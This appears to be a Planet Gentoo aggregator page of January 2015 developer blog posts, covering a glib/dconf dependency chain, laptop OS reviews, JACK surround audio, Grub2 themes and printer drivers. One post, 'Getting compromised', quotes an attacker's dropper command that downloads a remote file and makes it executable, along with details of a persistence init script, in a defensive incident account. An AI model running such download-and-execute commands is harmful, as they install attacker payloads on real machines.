[ebuild  N     ] x11-libs/libX11-1.6.2  USE="ipv6 -doc -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXext-1.3.3  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXfixes-5.0.1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrender-0.9.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/cairo-1.12.18  USE="X glib svg (-aqua) -debug (-directfb) (-drm) (-gallium) (-gles2) -opengl -openvg (-qt4) -static-libs -valgrind -xcb -xlib-xcb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXi-1.7.4  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gdk-pixbuf-2.30.8:2  USE="X introspection -debug -jpeg -jpeg2k {-test} -tiff" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcursor-1.1.14  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdamage-1.1.4-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrandr-1.4.2  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcomposite-0.4.4-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXtst-1.2.2  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-core-2.14.1:2  USE="X introspection" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-atk-2.14.1:2  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/harfbuzz-0.9.37:0/0.9.18  USE="cairo glib graphite introspection truetype -icu -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pango-1.36.8  USE="introspection -X -debug" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gtk+-2.24.25-r1:2  USE="introspection (-aqua) -cups -debug -examples {-test} -vim-syntax -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/librsvg-2.40.6:2  USE="introspection -tools -vala" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-themes/adwaita-icon-theme-3.14.1  USE="-branding" 0 KiB
[ebuild  N     ] x11-libs/gtk+-3.14.6:3  USE="X introspection (-aqua) -cloudprint -colord -cups -debug -examples {-test} -vim-syntax -wayland -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/dconf-0.22.0  USE="X {-test}" 0 KiB

Total: 78 packages (6 upgrades, 70 new, 2 in new slots), Size of downloads: 0 KiB

The following USE changes are necessary to proceed:
 (see "package.use" in the portage(5) man page for more details)
# required by x11-libs/gtk+-2.24.25-r1
# required by x11-libs/gtk+-3.14.6
# required by gnome-base/dconf-0.22.0[X]
# required by dev-libs/glib-2.42.1
# required by media-libs/harfbuzz-0.9.37[glib]
# required by x11-libs/pango-1.36.8
# required by gnome-base/librsvg-2.40.6
# required by x11-themes/adwaita-icon-theme-3.14.1
=x11-libs/cairo-1.12.18 X
BOOM. That's heavy. There's gtk2, gtk3, most of X ... and things want to enable USE="X" ... what's going on ?!

After some experimenting with selective masking and tracing dependencies I figured out that it's dev-libs/glib that pulls in "everything". Eh?
ChangeLog says:
  21 Jan 2015; Pacho Ramos  -files/glib-2.12.12-fbsd.patch,
  -files/glib-2.38.2-configure.patch, -files/glib-2.38.2-sigaction.patch,
  -glib-2.38.2-r1.ebuild, -glib-2.40.0-r1.ebuild, glib-2.42.1.ebuild:
  Ensure dconf is present (#498436, #498474#c6), drop old
So now glib depends on dconf (which is actually not correct, but fixes some bugs for gtk desktop apps). dconf has USE="+X" in the ebuild, so it overrides profile settings, and pulls in the rest.
USE="-X" still pulls in dbus unconditionally, and ... dconf is needed by glib, and glib is needed by pkgconfig, so that would be mildly upsetting as every user would now have dconf and dbus installed. (Unless, of course, we switched pkgconfig to USE="internal-glib")

After a good long discussion on IRC with some good comments on the bugreport we figured out a solution that should work for all:
dconf ebuild is fixed to not set default useflags. So only desktop profiles or USE="X" set by users will pull in X-related dependencies. glib gets a dbus useflag, which is default-enabled on desktop profiles, so there the dependency chain works as desired. And for the no-desktop no-X usecase we have no extra dependencies, and no reason to be grumpy.

This situation shows quite well how unintended side-effects may happen. The situation looked good for everyone on a desktop profile (and dconf is small enough to be tolerated as dependency). But on not-desktop profiles, suddenly, we're looking at a pile of 'wrong' dependencies, accidentally forced on everyone. Oops :)

In the end, all is well, and I'm still confused why writing a config file needs dbus and xml and stuff. But I guess that's called progress ...

January 21, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Old Gentoo system? Not a problem… (January 21, 2015, 21:05 UTC)

If you have a very old Gentoo system that you want to upgrade, you might have some issues with too old software and Portage which can’t just upgrade to a recent state. Although many methods exist to work around it, one that I have found to be very useful is to have access to old Portage snapshots. It often allows the administrator to upgrade the system in stages (say in 6-months blocks), perhaps not the entire world but at least the system set.

Finding old snapshots might be difficult though, so at one point I decided to create a list of old snapshots, two months apart, together with the GPG signature (so people can verify that the snapshot was not tampered with by me in an attempt to create a Gentoo botnet). I haven’t needed it in a while anymore, but I still try to update the list every two months, which I just did with the snapshot of January 20th this year.

I hope it at least helps a few other admins out there.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Demo Operating Systems on new hardware (January 21, 2015, 10:16 UTC)

Recently I got to interact with two Lenovo notebooks - an E445 with Ubuntu Demo preinstalled, and an E431 with Win8 Demo preinstalled.
Why do I say demo? Because these were completely unusable. Let me explain ...

The E445 is a very simple notebook - 14" crap display, slowest AMD APU they could find, 4GB RAM (3 usable due to graphics card stealing the rest). Slowest harddisk ever ;)
The E431 is pretty much the same form factor, but the slowest Intel CPU (random i3) and also 4GB RAM and a crap display.

On powerup the E445 spent about half an hour "initialising" and kinda installing whatever. Weird because you could do that before and deliver an instant-on disk image, but this whole thing hasn't been thought out.
The Ubuntu version it comes with (12.04 LTS I think?) is so old that the graphics drivers can't drive the display at native resolution out of the box. So your display will be a fuzzy 1024x768 upscaled to 1366x768. I consider this a demo because there's some obvious bugs - the black background glows purple, there's random output from init scripts bleeding over the bootsplash. And then once you login there's this ... hmm. Looks like a blend of MovieOS and a touchscreen UI and goes by the name of Unity. The whole mix is pretty much unusable, mostly because basic things like screen resolution are broken in ways that are not easy to fix.

The other device came with a Win8 demo. Out of the box it takes about 5 minutes to start, and then every app takes 30-60 seconds to start. It's brutally slow.
After boot about 2.5GB RAM are in use, so pretty much any action can trigger swapping. It's brutally slow. Oh wait, I already said that.
At some point it decided to update to 8.1, which took half an hour to download and about seven hours to install. WHAT TEH EFF!

The UI is ... MovieOS got drunk. A part is kinda touchscreen thingy, and the rest is even more confused. Localization is horribad (some parts are pictogram only, some part are text only - and since this is a chinese edition I wouldn't even know hot to reboot it! squiggly hat box squiggly bug ... or is it square squiggly star ? Oh my, this is just bad.
And I said demo, because shutdown doesn't. Looks like the hibernate and shutdown bugs are crosswired the wrong way?
There's random slowdowns doing basic tasks, even youtube video randomly stutters and glitches because the OS is still not ready for general use. And it's slow ... oh wait, I said that. So all in all, it's a nice showroom demo, but not useful.

Installing Gentoo was all in all pretty boring, with full KDE running the memory usage is near 500MB (compared to >2GB for the win demo). Video runs smoothly, audio works. Ethernet connection with r8169 works, WLAN with BCM43142 requires broadcom-sta aka. wl. Very very bad driver stupid, it'd be easier to not have this device built in.
Both the intel card in the E431 and the radeon in the E445 work well, although the HD 8550G needs the newest release of xf86-video-ati to work.

The E445 boots cleanly in BIOS mode, the E431 quietly fails (sigh) because SecureBoot (sigh!) unless you actively disable it. Also randomly the E431 tries to reset to factory defaults, or fails to boot with Fan Warning. Very shoddy, but usually smacking it with a hammer helps.

I'm a little bit sad that all new notebooks are so conservative with maximum amount of RAM, but on the upside the minimum is defined by Win8 Demo requirements. So most devices have 4GB RAM, which reminds me of 2008. Hmm.
Harddisks are getting slower and bigger - this seems to be mostly penny pinching. The harddisk in the R400 I had years ago was faster than the new ones!

And vendors should maybe either sell naked notebooks without an OS, or install something that is properly installed and preconfigured. And, maybe, a proper recovery DVD so that the OS can be reinstalled? Especially as both these notebooks come with a DVD drive. I have no opinion if it works because I lack media to test with, but it wastes space ...

(If you are a vendor, and want to have things tested or improved, feel free to send me free hardware and maybe consider compensating me for my time - it's not that hard to provide a good user experience, and it'll improve customer retention a lot!)

Getting compromised (January 21, 2015, 09:16 UTC)

Recently I was asked to set up a new machine. It had been minimally installed, network started, and then ignored for a day or two.

As I logged in I noticed a weird file in /root: n8005.tar
And 'file' said it's a shellscript. Hmmm ....

wget http://432.567.99.1/install/8005
chmod +x 8005

At this point my confidence in the machine had been ... compromised. "init 0" it is!
A reboot from a livecd later I was trying to figure out what the attacker was trying to do:
* An init script in /etc/init.d
# chkconfig: 12345 90 90
# description: epnlmqmjph
# Provides:             epnlmqmjph
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    epnlmqmjph
case $1 in
* A file in /usr/bin
# file epnlmqmjph
epnlmqmjph: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

# md5sum epnlmqmjph
2cb5174e26c6782db94ea336696cfb7f  epnlmqmjph
* a file in /sbin I think - I didn't write down everything, just archived it for later analysis
# file bin_z 
bin_z: ERROR: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linkederror reading (Invalid argument)
# md5sum bin_z 
85c1c4a5ec7ce3efef5c5b20c5ded09c  bin_z
The only action I could do at this stage was wipe and reinstall, and so I did.
So this was quite educational, and a few minutes after reboot I saw a connection with putty as user agent in the ssh logs.
Sorry kid, not today ;)

There's a strong lesson in this: Do not use ssh passwords. Especially for root. A weak password can be accidentally bruteforced in a day or two!

sshd has an awesome feature: "PermitRootLogin without-password" if you rely on root login, at least avoid sucessful password logins!

And I wonder how much accidental security running not-32bit not-CentOS gives ;)

January 19, 2015
Cinnamon 2.4 (January 19, 2015, 11:55 UTC)

A few weeks ago, I upgrade all cinnamon ebuilds to 2.4 in tree. However I could not get Cinnamon (shell part) to actually work, as in show anything useful on my display. So this is a public service announcement that if you like Cinnamon and want to help with this issue, please visit bug #536374. For some reason, the hacks found in gnome-shell does not seem to work with cinnamon’s shell.

January 16, 2015
Michał Górny a.k.a. mgorny (homepage, bugs)
Surround sound over network with Windows 8 (January 16, 2015, 15:26 UTC)

I’ve got a notebook with some fancy HD Audio sound card (stereo!), and a single output jack — not a sane way to get surround sound (sure, cool kids use HDMI these days). Even worse, connecting an external amplifier to the jack results in catching a lot of electrical interference. Since I also have a PC which has surround speakers connected, I figured it would be a good idea to stream the audio over the network.

On non-Windows, the streaming would be trivial to setup. Likely PulseAudio on both machines, few setup bits and done. If you are looking for a guide on how to do such a thing in Windows, you’re likely end up setting up an icecast server listening to the stereo mix. Bad twice. Firstly, stereo-only. Secondly, poor latency. Now imagine playing a game or watching a movie with sound noticeably delayed after picture (well, in the movie player you could at least play with A/V delay to work-around that). But there must be another way…

The ingredients

In order to get a working surround sound system, you need to have:

  1. two JACK2 servers — one on each computer,
  2. ASIO4ALL,
  3. and an ASIO-friendly virtual sound device such as VB-Audio Hi-Fi Cable.

Install the JACK server on the computer with speakers, and all the tools on the other machine.

Setting up the JACK slave (on speaker-PC)

I’m going to start with setting up the speaker-PC since it’s simpler. It can run basically any operating system, though I’m using Gentoo Linux for this guide. JACK is set up pretty much the same everywhere, with the only difference in used audio driver.

The choice of master vs. slave is pretty much arbitrary. The slave needs to either combine a regular audio driver with netadapter, or the net driver with audioadapter. I’ve used the former.

First, install JACK2. In Gentoo, it can be found in the pro-audio project overlay. A good idea is to disable D-Bus support (USE=-dbus) since I wasn’t able to get JACK running with it and the ebuild doesn’t build regular jackd when D-Bus support is enabled.

Afterwards, start JACK with the desired sound driver and a surround-capable device. You will want to specify a sample rate and bit depth too. Best fit it with the application you’re planning to use. For example:

$ jackd -R -d alsa -P surround40 -r 48000 -S

This starts the JACK daemon with real-time priority support (important for low latency), using ALSA playback device surround40 (4-speaker surround), 48 kHz sample rate and 16-bit samples.

Afterwards, load netadapter with matching number of capture channels, and connect them to the output channels:

$ jack_load netadapter -i '-C 4'
$ jack_connect netadapter:capture_1 system:playback_1
$ jack_connect netadapter:capture_2 system:playback_2
$ jack_connect netadapter:capture_3 system:playback_3
$ jack_connect netadapter:capture_4 system:playback_4

At this point, slave is ready. JACK will wait for a master to start, and will forward any audio received from the master to the local sound card surround output. Since JACK2 supports zero-configuration networking, you don’t need to specify any IP addresses.

Setting up the virtual device

After getting the slave up, it’s time to set the sound source. After installing all the components, the first goal is to set up the virtual audio device. Once the Hi-Fi Cable package is insalled (no need to reboot), the system should start seeing two new devices — playback device called ‘Hi-Fi Cable Input’ and recording device called ‘Hi-Fi Cable Output’. Now open the sound control panel applet and:

  1. select ‘Hi-Fi Cable Input’ as the default output device.
  2. Right-click it and configure speakers. Select whatever configuration is appropriate for your real speaker set (e.g. quad speakers).
  3. (Optionally) right-click it and open properties. On the advanced tab select sample rate and bit depth. Afterwards, open properties of the ‘Hi-Fi Cable Output’ recording device and set the same parameters.

Control Panel sound settings with virtual Hi-Fi Cable Input deviceAdvanced Hi-Fi Cable Input device properties (sample rate and bit depth setting)

As you may notice, even after setting the input to multiple speakers, the output will still be stereo. That’s a bug (limitation?) we’re going to work-around soon…

Setting up the JACK master

Now that device is ready, we need to start setting up JACK. On Windows, the ‘Jack Control’ GUI is probably the easiest way. Start with ‘Setup’. Ensure that the ‘portaudio’ driver is selected, and choose ‘ASIO::ASIO4ALL v2’ both as input and output device. The right-arrow button right of the text inputs should provide a list of devices to select. Additionally select the sample rate matching the one set for the virtual device and the JACk slave.

JACK setup window

Now, we need to load the netmanager module. Similarly to the slave setup, this is done using jack_load. To get this fully automated, you can use the ‘Execute script after startup’ option from the ‘Options’ (right-arrow button is not helpful this time). Create a new .bat file somewhere, and put the following command inside:

jack_load netmanager

Save the file and select is as post-startup script. Now the module will be automatically loaded every time you start JACK via Jack Control. You may also fine-tune some of the ‘Misc’ settings to fit your preferences. Then confirm ‘Ok’ and click ‘Start’. If everything went well so far, after clicking ‘Connect’ you should see both ‘System’ and the slave’s hostname (assuming it is up and running). Do not connect anything yet, just verify that JACK sees the slave.

Connecting the virtual sound card to JACK

Now that the JACK is ready, it’s time to connect the virtual sound card to the remote host. The traditional way of doing that would be through connecting the local recording device (stereo mix or Virtual Cable Output) to the respective remote pins. However, that would mean just stereo. Instead, we have to cheat a little.

One of the fancy features of VB-Audio’s Virtual Hi-Fi Cable is that it supports using ASIO-compatible sound processors. In other words, the sound from virtual cable input is directed into ASIO output port for processing. Good news is that the stereo stripping occurs directly in virtual cable output, so ASIO still gets all the channels. All we have to do is to capture sound there…

Find VB-Cable’s ‘ASIO Bridge’ and start it. If the button in the middle states ‘ASIO OFF’, switch it to enable ASIO. Then click on the ‘Select A.S.I.O. Device’ text below it and select ‘JackRouter’. If everything went well, ‘VBCABLE_AsioBridge’ should appear in the JACK connection panel.

ASIO Bridge window

The final touches

Now that everything’s in place, it’s just a matter of connecting the right pins. To avoid having to connect them manually every time, use the ‘Patchbay’ panel. First, use ‘Add’ on left-hand side to add an output socket, select ‘VBCABLE_AsioBridge’ client and keep clicking ‘Add plug’ for all the input channels. Then, ‘Add’ on right-hand side, your remote host as client and add all the output channels. Now select both new sockets and ‘Connect’.

JACK patchbay setup

Save your new patchbay definition somewhere, and ‘Activate’ it. If you did well, the connections window should now show connections between respective local and remote pins and you should be able to hear sound from the remote speakers.

JACK connections window after setup

Now you can open ‘Setup’ again, and on the ‘Options’ tab activate patchbay persistence. Select your newly created patchbay definition file and from now on, starting JACK should enable the patchbay, and the patchbay should ensure that the pins are connected every time they reappear.

Maintenance notes

First of all, you usually don’t need to set an explicit connection between your virtual device and real system audio device. On my system that connection is established automatically, so that the sounds reach both remote host and local speakers. If that’s unrequested, just mute the sound card…

Secondly, note that now the virtual sound card is the default device, so applications will control its volume (both for remote and local speakers). If you want to mute the local speakers, you need to open the mixer and select your local sound card from device drop-down.

Thirdly, VBCABLE_AsioBridge likes to disappear occasionally when restarting JACK. If you don’t see it in the connections, just turn it off and on again (the ‘ASIO ON’ button) and it should reappear.

Fourthly, if you hear skipping, you can try playing with ‘Frames/Period’ in JACK’s setup. Or reduce the sample rate.

January 14, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Cool Gentoo-derived projects (I): SystemRescueCD (January 14, 2015, 22:53 UTC)

Gentoo Linux is the foundation for quite some very cool and useful projects. So, I'm starting (hopefully) a series of blog posts here... and the first candidate is a personal favourite of mine, the famous SystemRescueCD.
Ever needed a powerful Linux boot CD with all possible tools available to fix your system? You switched hardware and now your kernel hangs on boot? You want to shrink your Microsoft Windows installation to the absolute minimum to have more space for your penguin picture collection? Your Microsoft Windows stopped booting but you still need to get your half-finished PhD thesis off the hard drive? Or maybe you just want to install the latest and greatest Gentoo Linux on your new machine?

For all these cases, SystemRescueCD is the Swiss army knife of your choice. With lots of hardware support, filesystem support, software, and boot options ranging from CD and DVD to installation on USB stick and booting from a floppy disc (!), just about everything is covered. In addition, SystemRescueCD comes with a lot of documentation in several languages.

The page on how to create customized versions of SystemRescueCD gives a few glimpses on how Gentoo is used here. (I'm also playing with a running version in a virtual machine while I type this. :) Basically the internal filesystem is a normal Gentoo x86 (i.e. 32bit userland) installation, with distfiles, portage tree, and some development files (headers etc.) removed to decrease disk space usage. (Skimming over the files in /etc/portage, the only really unusual thing which I can see is that >=gcc-4.5 is masked; the installed GCC version is 4.4.7- but who cares in this particular case.) After uncompressing the filesystem and re-adding the Gentoo portage tree, it can be used as a chroot, and (with some re-emerging of dependencies because of the deleted header files) packages can be added, deleted, or modified.

Downsides? Well, not much. Even if you select a 64bit Kernel on boot, the userland will always be 32bit. Which is fine for maximum flexibility and running on ancient hardware, but of course imposes the usual limits. And rsync then runs out of memory after copying a few TByte of data (hi Patrick)... :D

Want to try? Just emerge app-admin/systemrescuecd-x86 and you'll comfortably find the ISO image installed on your harddrive in /usr/share/systemrescuecd/.

From the /root/AUTHORS file in the rescue system:
SystemRescueCd (x86 edition)

* Main Author:  Francois Dupoux
* Other contributors:
  - Jean-Francois Tissoires (Oscar and many help for testing beta versions)
  - Franck Ladurelle (many suggestions, and help for scripts)
  - Pierre Dorgueil (reported many bugs and improvements)
  - Matmas did the port of linuxrc for loadlin
  - Gregory Nowak (tested the speakup)
  - Fred alias Sleeper (Eagle driver)
  - Thanks to Melkor for the help to port to unicode

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
Gentoo needs focus to stay relevant (January 14, 2015, 03:36 UTC)

After nearly 12 years working on Gentoo and hearing blathering about how “Gentoo is about choice” and “Gentoo is a metadistribution,” I’ve come to a conclusion to where we need to go if we want to remain viable as a Linux distribution.

If we want to have any relevance, we need to have focus. Everything for everybody is a guarantee that you’ll be nothing for nobody. So I’ve come up with three specific use cases for Gentoo that I’d like to see us focus on:

People developing software

As Gentoo comes, by default, with a guaranteed-working toolchain, it’s a natural fit for software developers. A few years back, I tried to set up a development environment on Ubuntu. It was unbelievable painful. More recently, I attempted the same on a Mac. Same result — a total nightmare if you aren’t building for Mac or iOS.

Gentoo, on the other hand, provides a proven-working development environment because you build everything from scratch as you install the OS. If you need headers or some library, it’s already there. No problem. Whereas I’ve attempted to get all of the barebones dev packages installed on many other systems and it’s been hugely painful.

Frankly, I’ve never come across as easy of a dev environment as Gentoo, if you’ve managed to set it up as a user in the first place. And that’s the real problem.

People who need extreme flexibility (embedded, etc.)

Nearly 10 years ago, I founded the high-performance clustering project in Gentoo, because it was a fantastic fit for my needs as an end user in a higher-ed setting. As it turns out, it was also a good fit for a number of other folks, primarily in academia but also including the Adelie Linux team.

What we found was that you could get an extra 5% or so of performance out of building everything from scratch. At small scale that sounds absurd, but when that translates into 5-6 digits or more of infrastructure purchases, suddenly it makes a lot more sense.

In related environments, I worked on porting v5 of the Linux Terminal Server Project (LTSP) to Gentoo. This was the first version that was distro-native vs pretending to be a custom distro in its own right, and the lightweight footprint of a diskless terminal was a perfect fit for Gentoo.

In fact, around the same time I fit Gentoo onto a 1.8MB floppy-disk image, including either the dropbear SSH client or the kdrive X server for a graphical environment. This was only possible through the magic of the ROOT and PORTAGE_CONFIGROOT variables, which you couldn’t find in any other distro.

Other distros such as ChromeOS and CoreOS have taken similar advantage of Gentoo’s metadistribution nature to build heavily customized Linux distros.

People who want to learn how Linux works

Finally, another key use case for Gentoo is for people who really want to understand how Linux works. Because the installation handbook actually works you through the entire process of installing a Linux distro by hand, you acquire a unique viewpoint and skillset regarding what it takes to run Linux, well beyond what other distros require. In fact I’d argue that it’s a uniquely portable and low-level skillset that you can apply much more broadly than those you could acquire elsewhere.

In conclusion

I’ve suggested three core use cases that I think Gentoo should focus on. If it doesn’t fit those use cases, I would suggest that we allow but not specifically dedicate effort to enabling those particulars.

We’ve gotten overly deadened to how people want to use Linux, and this is my proposal as to how we could regain it.

Tagged: gentoo

January 12, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Tool to preview Grub2 themes easily (using KVM) (January 12, 2015, 21:04 UTC)

The short version: To preview a Grub2 theme live does not have to be hard.


When I first wrote about a (potentially to lengthy) way to make a Grub2 theming playground in 2012, I was hoping that people would start throwing Gentoo Grub2 themes around so that it would become harder picking one rather than finding one. As you know, that didn’t happen.

Therefore, I am taken a few more steps now:

So this post is about that new tool: grub2-theme-preview. Basically, it does the steps I blogged about in 2012, automated:

  • Creates a sparse disk as a regular file
  • Adds a partition to it and formats using ext2
  • Installs Grub2, copies a theme of your choice and a config file to make it work
  • Starts KVM

That way, a theme creator can concentrate on the actual work on the theme.

To give an example, to preview theme “Archxion” off GitHub as of today you could run:

git clone
git clone
cd grub2-theme-preview
./grub2-theme-preview ../Grub2-themes/Archxion/

Once grub2-theme-preview has distutils/setuputils packaging and a Gentoo ebuild, that gets a bite easier, still.

The current usage is:

# ./grub2-theme-preview --help
usage: grub2-theme-preview [-h] [--image] [--grub-cfg PATH] [--version] PATH

positional arguments:
  PATH             Path of theme directory (or image file) to preview

optional arguments:
  -h, --help       show this help message and exit
  --image          Preview a background image rather than a whole theme
  --grub-cfg PATH  Path grub.cfg file to apply
  --version        show program's version number and exit

Before using the tool, be warned that:

  • it is alpha/beta software that
  • needs root permissions in some part (calling sudo).
  • So I don’t take any warranty for anything right now!

Here is what to expect from running

# ./grub2-theme-preview /usr/share/grub/themes/gutsblack-archlinux/

assuming you have grub2-themes/gutsblack-archlinux off the grub2-themes overlay installed with this grub.cfg file:

Another example using the --image switch for background-image-only themes, using a 640×480 rendering of vector remake of gentoo-cow:

The latter is a good candidate for that Grub2 version of media-gfx/grub-splashes I mentioned earlier.

I’m looking forward to your patches and pull requests!


New Gentoo overlay: grub2-themes (January 12, 2015, 20:38 UTC)


I’ve been looking around for Grub2 themes a bit and started a dedicated overlay to not litter the main repository. The overlay

Any Gentoo developer on GitHub probably has received a

[GitHub] Subscribed to gentoo/grub2-themes-overlay notifications

mail already. I did put it into Gentoo project account rather than my personal account because I do not want this to be a solo project: you are welcome to extend and improve. That includes pull requests from users.

The licensing situation (in the overlay, as well as with Grub2 themes in general) is not optimal. Right now, more or less all of the themes have all-rights-reserved for a license, since logos of various Linux distributions are included. So even if the theme itself is licensed under GPL v2 or later, the whole thing including icons is not. I am considering to add a use flag icons to control cutting the icons away. That way, people with ACCEPT_LICENSE="-* @FREE" could still use at least some of these themes. By the way, I welcome help identifying the licenses of each of the original distribution logos, if that sounds like an interesting challenge to you.

More to come on Grub2 themes. Stay tuned.

January 10, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Poppler is contributing to global warming (January 10, 2015, 19:48 UTC)

As you may have noticed by now if you're running ~arch, the Poppler release policies have changed.

Previously Poppler (app-text/poppler) used to have stable branches with even middle version number, say e.g. 0.24, and bug fix releases 0.24.1, 0.24.2, 0.24.3, ... but a (most of the times) stable ABI. This meant that such upgrades could be installed without the need to rebuild any applications using Poppler. Development of new features took place in git master or in the development releases such as, say, 0.25.1, with odd middle number; these we never packaged in Gentoo anyway.

Now, the stable branches are gone, and Poppler has moved to a flat development model, with the 0.28.1 stable release (stable as intended by upstream, not "Gentoo stable") being followed by 0.29.0 and now 0.30.0 another month later. Unsurprisingly the ABI and the soversion of has changed each time, triggering in Gentoo a rebuild of all applications linking to This includes among other things LuaTeX, Inkscape, and LibreOffice (wheee).

From a Gentoo maintainer point of view, the new schedule is not so bad; the API changes are minor (if any), and packages mostly "just compile". The only thing left to do is to check for soversion increases and bump the package subslot for the automated rebuild. We're much better off than all the binary distributions, since we can just keep tracking new Poppler releases and do not need to backport e.g. critical bug fixes ourselves just so the binary package fits to all the other binary packages of the distro.

From a Gentoo user point of view... well, I guess you can turn the heating down a bit. If you are running ~arch you will probably see some more LibreOffice rebuilds in the upcoming future. If things get too bad, you can always mask a new poppler version in /etc/portage/package.mask yourself (but better check for security bugs then, glsa-check from app-portage/gentoolkit is your friend); if the number of rebuilds gets completely out of hand, we may consider adding e.g. every second Poppler version only package-masked to the portage tree.

Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Dell 1350cnw on Gentoo Linux with CUPS (January 10, 2015, 13:00 UTC)

You’d think that a company that had produced and does produce some Linux based products would also provide CUPS drivers for their printers, like the Dell 1350cnw. Not so, it seems. Still, I was undeterred and found a way to make it happen.

First, download the driver for the Xerox Phaser 6000 in DEB format. Yeah, that’s right. We’re going to use a Xerox driver to print to our Dell printer.

Once you have it, do the following on the command line:

# unzip
# cd deb_1.01_20110210
# ar x xerox-phaser-6000-6010_1.0-1_i386.deb
# tar xf data.tar.gz
# gunzip usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd.gz
# mkdir -p /usr/lib/cups/filter/
# cp ~/deb_1.01_20110210/usr/lib/cups/filter/xrhkaz* /usr/lib/cups/filter/
# mkdir -p /usr/share/cups/Xerox/dlut/
# cp ~/deb_1.01_20110210/usr/share/cups/Xerox/dlut/Xerox_Phaser_6010.dlut /usr/share/cups/Xerox/dlut/

Or, because I’ve seen rumors that there are other flavors of Linux, if you’re on a distribution that supports DEB files, just initiate the install from the DEB file, however one does that.

Finally, add the Dell 1350cnw via the CUPS browser interface. (I used whichever one had “net” in the title as the printer is connected directly to the network.) Upload  ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd when prompted for a driver.

Everything works as expected for me, and in color!

January 07, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Slock 1.2 background colour (January 07, 2015, 02:41 UTC)

In a previous post, I discussed the method for changing the background colour for slock 1.1. Now that slock 1.2 is out, and is in the Portage tree in Gentoo, the ‘savedconfig’ USE flag is a little different than it used to be. In 1.1, the ‘savedconfig’ USE flag would essentially copy the file to /etc/portage/savedconfig/x11-misc/slock-$version. Now, in slock 1.2, there is still a config file in that location, but it is not just a copy of the file. Rather, one will see the following two-line file:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "black"
#define COLOR2 "#005577"

As indicated in the file, you can use either a name for a generic colour (like “black”) or the hex representation for the colour of your choice (see The Color Picker for an easy way to find the hex code for your colours).

There are two things to keep in mind when editing this file:

  • The initial hash (#) is NOT indicating a comment, and MUST remain. If you remove it, slock 1.2 will fail to compile
  • The COLOR1 variable is for the default colour of the background, whilst the COLOR2 variable is for the background colour once one starts typing on a slocked screen

Hope that this information helps for those people using slock (especially within Gentoo Linux).


January 05, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Gentoo Grub 2.x theme? (January 05, 2015, 22:11 UTC)


It’s 2015 and I have not heard of any Gentoo GRUB 2.x themes, yet. Have you?

If you could imagine working on a theme based on the vector remake of gentoo-cow (with sound licensing), please get in touch!

CoreOS is based on… Gentoo! (January 05, 2015, 16:39 UTC)

I first heard about CoreOS from in the news item on Rocket, CoreOS’s fork/re-write of Docker.

I ran into CoreOS again on 31c3 and learned it is based on… Gentoo! A few links for proof:

January 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

I'm posting this here because a new LibreOffice version was stabilized two days ago, and at the same time a hidden bug crept in...

Because of an unintended interaction between a python-related eclass and the app-office/libreoffice ebuilds (any version), merging recently self-generated (see below for exact timeframe) libreoffice binary packages can fail to install with the error

* ERROR: app-office/libreoffice- failed (setup phase):
* PYTHON_CFLAGS is invalid for python-r1 suite, please take a look @ 

The problem is fixed now, but any libreoffice binary packages generated with a portage tree from Fri Jan 2 00:15:15 2015 UTC to Sun Jan 4 22:18:12 2015 UTC will fail to reinstall. Current recommendation is to delete the self-generated binary package and re-install libreoffice from sources (or use libreoffice-bin).

This does NOT affect app-office/libreoffice-bin.

Updates may be posted here or on bug 534726. Happy heating. At least it's winter.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.0 (January 04, 2015, 19:16 UTC)

I’m very pleased to announce the release of py3status v2.0 which I’d like to dedicate to the person who’s behind all the nice improvements this release features : @tablet-mode !

His idea on issue #44 was to make py3status modules configurable. After some thoughts and merges of my own plans of development, we ended up with what I believe are the most ambitious features py3status provides so far.


